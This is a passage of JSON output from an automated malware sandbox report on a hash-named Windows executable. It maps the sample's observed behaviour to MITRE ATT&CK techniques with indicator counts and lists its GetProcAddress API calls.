"Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Rootkit", "attck_id": "T1014", "attck_id_wiki": "https://attack.mitre.org/techniques/T1014", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Code Signing", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002", "informative_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Rundll32", "attck_id": "T1218.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218/011", "malicious_identifiers_count": 1, "parent": {"technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 22}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Removable Media", "attck_id": "T1025", "attck_id_wiki": "https://attack.mitre.org/techniques/T1025", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "suspicious_identifiers_count": 2, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Dead Drop Resolver", "attck_id": "T1102.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over Web Service", "attck_id": "T1567", "attck_id_wiki": "https://attack.mitre.org/techniques/T1567", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Manipulation", "attck_id": "T1565", "attck_id_wiki": "https://attack.mitre.org/techniques/T1565", "malicious_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeA (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeW (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter NsiAllocateAndGetTable (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CM_Open_Class_Key_ExW (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter 